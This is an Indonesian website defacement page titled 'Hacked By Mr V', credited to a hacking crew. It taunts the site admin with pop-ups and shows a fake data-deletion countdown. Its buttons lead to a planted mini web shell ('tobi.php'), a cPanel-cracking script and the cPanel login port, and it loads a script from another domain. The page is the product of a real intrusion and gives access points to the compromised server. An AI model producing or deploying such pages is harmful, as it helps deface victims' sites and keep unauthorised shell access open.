

<html> <head> 
    <link rel="icon" type="image/jpg" href="https://g.top4top.io/p_16119t55f3.jpg"> <meta name="description" content="Kehidupan Mulai Tidak Asyik:)"> <meta name="keywords" content="Kelelawar Cyber Team"> <meta http-equiv="cache-control" content="index,cache"> <meta http-equiv="pragma" content="index,cache"> <title>Hacked By Mr V</title>
    <script>alert("Im Sorry Admin!");</script>
</head>
        <!-- sweetalert2
        #### jangan di ganti ####-->
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
        <script src="http://www.ctwood.com.sg/style/alert.js" ></script>
        <!-- Font Family -->
        <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
          <style type="text/css">
        /* latin */ @font-face { font-family: 'Iceland'; font-style: normal; font-weight: 400; src: local('Iceland'), local('Iceland-Regular'), url(https://fonts.gstatic.com/s/iceland/v8/rax9HiuFsdMNOnWPaKtMARJYk0o.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }
		</style>
	<!-- style body -->
	<link rel="stylesheet" href="http://ctwood.com.sg/style/shell.css" />
	<!-- style login shell -->
	<!--<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">-->
	<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
	<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju-2.js" type="text/javascript"></script><link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"><link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
	    <link href="https://fonts.googleapis.com/css?family=Mali:400i,700i" rel="stylesheet" type="text/css">
	<style type="text/css">
    .tombol{
  background:#2C97DF;
  color:white;
  border-top:0;
  border-left:0;
  border-right:0;
  border-bottom:5px solid #2A80B9;
  padding:10px 20px;
  text-decoration:none;
  font-family:sans-serif;
  font-size:11pt;
  
}
h1{
	font-family:Kelly Slab;
	font-size:30px;
	}
input[type=password] {
	border: 1px solid #15CFF4;
	width: 300px;
	height: 25px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: gold;
	font-family:Kelly Slab;
	font-size: 13px;
}
.page{
    		position: absolute;
    		margin: auto;
    		height: 50%;
    		top: 0; bottom: 0; left: 0; right:0;
     	}
  .blink_text {
-webkit-animation-name: blinker;
-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: red;
}
@-moz-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
 
 #copy {
 	color: lime;
 	font-weight: bold;
 	font-family: Kelly Slab;
 }
 #copy a {
 	color: white;
 }
 #copy a:hover {
 	color: blue;
 }

body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: #15CFF4;
}
table{
border: 1px #000000;
}
.s_tb{
border:1px silver;
}
a{
color:white;
font-size: 19px;
text-decoration:none;
}
a:hover{
color:green;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
h2{
font-family:Kelly Slab;
font-size:25px;
color:white;
}
h3{
font-size:35px;
}
h4{
font-size:15px;
font-family:Kelly Slab;
color:white;
}
.arif_table {;
	background:transparent;
	border:1px solid blue;
	font-family:Kelly Slab;
    display:inline-block;
	cursor:pointer;
	color:#15CFF4;
	font-size:17x;
	font-weight:bold;
	padding:3px 20px;
	text-decoration:none;
	text-shadow:0px -1px 0px white;
       }
       .arif_table {;
	background:transparent;
	border:2px solid silver;
	font-family:Kelly Slab;
	color:white;
	font-size:17x;
	font-weight:bold;
	padding:3px 20px;
	text-decoration:none;
	text-shadow:0px -1px 0px #ff0505;
       }
     .potext {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family:Kelly Slab;
	font-size: 13px;
}

    </style>
    <!-- javascript sweet alrt -->
    <script type="text/javascript" >
        
        	    function mini(){
        	        Swal.fire({
  title: 'Hahaha Bangsat Lo:v',
  icon: '',
  iconHtml: '?',
  confirmButtonText: 'ya',
  cancelButtonText: 'no',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("");
        }
      })
        	    }

function hapus(){
let timerInterval
Swal.fire({
  title: 'Hapus Data!',
  icon: 'warning',
  html: 'Sedang Menghapus <b></b> mb',
  timer: 5000,
  timerProgressBar: false,
  onBeforeOpen: () => {
    Swal.showLoading()
    timerInterval = setInterval(() => {
      Swal.getContent().querySelector('b')
        .textContent = Swal.getTimerLeft()
    }, 100)
  },
  onClose: () => {
    clearInterval(timerInterval)
  }
}).then((result) => {
  if (
    /* Read more about handling dismissals below */
    result.dismiss === Swal.DismissReason.timer,
    swal.fire({
        
      title: 'Prankk!!!!',
      text: 'Anda Kena Prankk!!!!!',
       icon: 'success',
       showConfirmButton: false,
       footer:'<button><a href="http://api.whatsapp.com/send?phone=6289514095179&text=Mr.V">Contacts Me </a></button>'
       
    })
  
  ){
    console.log('I was closed by the timer') // eslint-disable-line
  }
})
}

function ip(){
const ipAPI = 'https://api.ipify.org?format=json'

Swal.queue([{
  title: 'Perlihatkan ip ku',
  confirmButtonText: 'Show my IP',
  text:
    'ini hanya untuk memperlihatkan ' +
    'ip saja (Aman)',
  showLoaderOnConfirm: true,
  preConfirm: () => {
    return fetch(ipAPI)
      .then(response => response.json())
      .then(data => Swal.insertQueueStep(data.ip))
      .catch(() => {
        Swal.insertQueueStep({
          icon: 'error',
          title: 'maaf tidak bisa menampilkan ip anda'
        })
      })
  }
}])
}
    </script>
    </head>
    <!-- End Head -->
    <!-- Star Body -->
    <body>
        <!-- Header -->
        <center>
                        <img width="500" src="https://g.top4top.io/p_16119t55f3.jpg"/>
                        <p class="blink_text"style="font-size:45px;color: yellow;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Kelly Slab;"> ..:: Hacked By Mr V ::..</p>  
                                              
    <br />
            <!-- body -->
            <font face="Kelly slab" size="5px" color=white style="text-shadow:0px 0px 20px #00ffff , 0px 0px 20px #00ffff;" >KETIKA KAMU PENASARAN<br>KAMU AKAN MENEMUKAN HAL MENARIK UNTUK DIKERJAKAN !!!  <br>
            <br>
            <!-- Thanks To All My Friends -->
             <br>
            <font face="Kelly Slab" size="5px" color=red style="text-shadow:0px 0px 20px #00ffff , 0px 0px 20px #00ffff;" >Thanks To All Official Members KCT</font>
            <marquee width="50%" behavior="alternate"><font face="Kelly Slab" size="4px"color=white style="text-shadow:0px 0px 20px #00ffff , 0px 0px 20px #00ffff;" >[ Mr V - ./Tn.Error404 - Kiebo - `Mr.XToy°✓ - Tn.Culun - Suapnasi1 - S4NTR1 TERS4K1T1 - Mr.Kimcil id.22 - Cynax - ZACH - Sayno - Mugiwara ]</marquee>
            <!-- Tombol Jangan Di Ganti -->
            <br> <br /><button class="arif_table" onclick="mini()">LOGIN MINI SHELL</button> 
            <button  class="arif_table" onclick="hapus()">TRACK ME</button>
            <button class="arif_table" onclick="ip()">CEK YOUR IP</button><br><br>
            <!-- End The Tombol -->
        </center>
       <!-- Musik -->
       <! -- Background gw mank -->
       <style type="text/css"> body{ background: #0a0a0a; height: 100vh; width: 100%; margin: 0; padding: 12px; display: flex; flex-direction: column; justify-content: center; align-items: center; background: linear-gradient(rgba(20, 10, 10, 0.3), rgba(0, 0, 0, 0.3)), repeating-linear-gradient(0, transparent, transparent 4px, black 10px, black 2px), url(""); background-size: cover; background-position: center; z-index: 1; } </style> 
       <! -- css text kelap kelip by lutfie404 -->
       <style>
       <!-- style login shell -->
       <style type=text/css >
       .tombol{
       background:#2C97DF;
       color:white;
       border-top:0;
       border-left:0;
       border-right:0;
       border-bottom:5px solid #2A80B9;
       padding:10px 20px;
       text-decoration:none;
       font-family:sans-serif;
       font-size:11pt;
       
       }
       h2{
       font-family:Share Tech Mono;
       font-size:30px;
       }
       input[type=password] {
       border: 1px solid #15CFF4;
       width: 300px;
       height: 25px;
       padding-left: 5px;
       margin: 10px auto;
       resize: none;
       background: transparent;
       color: gold;
       font-family:Share Tech Mono;
       font-size: 13px;
       }
       .page{
       position: absolute;
       margin: auto;
       height: 50%;
       top: 0; bottom: 0; left: 0; right:0;
       }
       .blink_text {
       -webkit-animation-name: blinker;
       -webkit-animation-duration: 2s;
       -webkit-animation-timing-function: linear;
       -webkit-animation-iteration-count: infinite;
       
       -moz-animation-name: blinker;
       -moz-animation-duration: 2s;
       -moz-animation-timing-function: linear;
       -moz-animation-iteration-count: infinite;
       
       animation-name: blinker;
       animation-duration: 2s;
       animation-timing-function: linear;
       animation-iteration-count: infinite;
       
       color: red;
       }
       @-moz-keyframes blinker { 
       0% { opacity: 5.0;
       }
       50% { opacity: 0.0;
       }
       100% { opacity: 5.0;
       }
       }
       @-webkit-keyframes blinker { 
       0% { opacity: 5.0;
       }
       50% { opacity: 0.0;
       }
       100% { opacity: 5.0;
       }
       }
       @keyframes blinker { 
       0% { opacity: 5.0;
       }
       50% { opacity: 0.0;
       }
       100% { opacity: 5.0;
       }
       }
       
       #copy {
       color: lime;
       font-weight: bold;
       font-family: Kelly Slab;
       }
       #copy a {
       color: white;
       }
       #copy a:hover {
       color: blue;
       }
       
       body{
       font-family: Kelly Slab;
       background-color: black;
       color:white;
       }
       #content tr:hover{
       background-color: blue;
       text-shadow:0px 0px 10px #fff;
       }
       #content .first{
       background-color: #15CFF4;
       }
       table{
       border: 1px #000000;
       }
       .s_tb{
       border:1px silver;
       }
       a{
       color:white;
       font-size: 19px;
       text-decoration:none;
       }
       a:hover{
       color:green;
       text-shadow:0px 0px 10px #ffffff;
       }
       input,select,textarea{
       border: 2px #000000 solid;
       -moz-border-radius: 5px;
       -webkit-border-radius:5px;
       border-radius:5px;
       }
       h2{
       font-family:Kelly Slab;
       font-size:25px;
       color:white;
       }
       h3{
       font-size:35px;
       }
       h4{
       font-size:15px;
       font-family:Kelly Slab;
       color:white;
       }
       .arif_table {;
       background:transparent;
       border:1px solid blue;
       font-family:Share Tech Mono;
       display:inline-block;
       cursor:pointer;
       color:#15CFF4;
       font-size:19x;
       font-weight:bold;
       padding:3px 20px;
       text-decoration:none;
       text-shadow:0px -1px 0px white;
       }
       .arif_table {;
       background:transparent;
       border:2px solid silver;
       font-family:Share Tech Mono;
       color:white;
       font-size:18x;
       font-weight:bold;
       padding:3px 29px;
       text-decoration:none;
       text-shadow:0px 0px 20px #15CFF4;
       }
       .potext {
       border: 1px solid #ffffff;
       width: 100%;
       height: 400px;
       padding-left: 5px;
       margin: 10px auto;
       resize: none;
       background: transparent;
       color: #ffffff;
       font-family:Share Tech mono;
       font-size: 13px;
       }
       
       </style>
       <!-- javascript sweet alrt -->
       <script type="text/javascript" >
       
       
       function logcpanel(){
       Swal.fire({
       title: 'Login cpanel website stah?',
       icon: '',
       iconHtml: '?',
       confirmButtonText: 'Iya',
       cancelButtonText: 'Kgk,cpanel gw udh banyak',
       showCancelButton: true,
       showCloseButton: true
       }).then((result) => {
       if (result.value) {
       location.replace(":2080");
       }
       })
       }
       
       function cpanel(){
       Swal.fire({
       title: 'Mau crack cpanel kah om?',
       icon: '',
       iconHtml: '?',
       confirmButtonText: 'Hooh',
       cancelButtonText: 'Kgk',
       showCancelButton: true,
       showCloseButton: true
       }).then((result) => {
       if (result.value) {
       location.replace("cpanel.php");
       }
       })
       }
       
       function mini(){
       Swal.fire({
       title: 'Apakah ingin Menuju Mini shell Gw?',
       icon: '',
       iconHtml: '?',
       confirmButtonText: 'iya dong',
       cancelButtonText: 'Kepencet :v',
       showCancelButton: true,
       showCloseButton: true
       }).then((result) => {
       if (result.value) {
       location.replace("tobi.php");
       }
       })
       }
       
       function hapus(){
       let timerInterval
       Swal.fire({
       title: 'Hapus Data!',
       icon: 'warning',
       html: 'Sedang Menghapus <b></b> gb',
       timer: 20000,
       timerProgressBar: false,
       onBeforeOpen: () => {
       Swal.showLoading()
       timerInterval = setInterval(() => {
       Swal.getContent().querySelector('b')
       .textContent = Swal.getTimerLeft()
       }, 100)
       },
       onClose: () => {
       clearInterval(timerInterval)
       }
       }).then((result) => {
       if (
       /* Read more about handling dismissals below */
       result.dismiss === Swal.DismissReason.timer,
       swal.fire({
       
       title: 'Data anda',
       text: 'Ga di apa2 in :v',
       icon: 'success',
       showConfirmButton: false,
       
       
       })
       
       ){
       console.log('I was closed by the timer') // eslint-disable-line
       }
       })
       }
       
       function ip(){
       const ipAPI = 'https://api.ipify.org?format=json'
       
       Swal.queue([{
       title: 'Perlihatkan ip ku',
       confirmButtonText: 'Show my IP',
       text:
       'ini hanya untuk memperlihatkan ' +
       'ip saja (Aman)',
       showLoaderOnConfirm: true,
       preConfirm: () => {
       return fetch(ipAPI)
       .then(response => response.json())
       .then(data => Swal.insertQueueStep(data.ip))
       .catch(() => {
       Swal.insertQueueStep({
       icon: 'error',
       title: 'maaf tidak bisa menampilkan ip anda'
       })
       })
       }
       }])
       }
       </script>
       <! --- tombol lagu -- !>
       <style type="text/css">
       .lagu{
       background:transparent;
       border:2px solid silver;
       font-family:Share Tech Mono;
       color:white;
       font-size:18x;
       font-weight:bold;
       padding:3px 29px;
       text-decoration:none;
       text-shadow:0px 0px 20px #15CFF4;
       }
       </style>
       <! -- script lagu -- !>
       <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 
       </script>
       <! -- efek glitch/error2 -->
       <style>h3{
       color: #000000; text-decoration: none; border-radius:0px; border:0px;margin:0px; padding:0px; animation:jembot 0.5s linear infinite;
       }
       @keyframes
       jembot{
       2%{color:white;}3%{transform:translate(2px,-10px) skewX(3500deg);}5%{transform:translate(0px,0px) skewX(0deg);}2% , 54%{transform:translateX(0px) skew(0deg);}55%{transform:translate(-2px,6px) skew(-5530deg);}56%{transform:translate(0px,0px) skew(0deg);}57%{transform:translate(4px,-10px) skew(-70deg);}58%{transform:translate(0px,0px) skew(0deg);}62%{transform:translate(0px,20px) skew(0deg);}63%{transform:translate(4px,-2px) skew(0deg);}90%{transform:translate(1px,3px); skew(-230deg);}95%{transform:translate(-7px,2px); skew(-120deg);}100%{transform:translate(0px,0px) skew(0deg);}
       </style>
       <! -- Border atas -->   </script><center>        
       </strong><br><strong>
       <! -- Tombol2 -- !>
       <button class="lagu" onclick="play();liat();"><font face="Teko" size="5" color="white" >PLAY MUSIC</font></button><audio id="lagu" src="https://l.top4top.io/m_1644smxxk1.mp3"></audio><br>
       <br><br><! -- thank all my friends -->
       </font>   </font>
       
          </body>
       <!-- end Body -->
</html>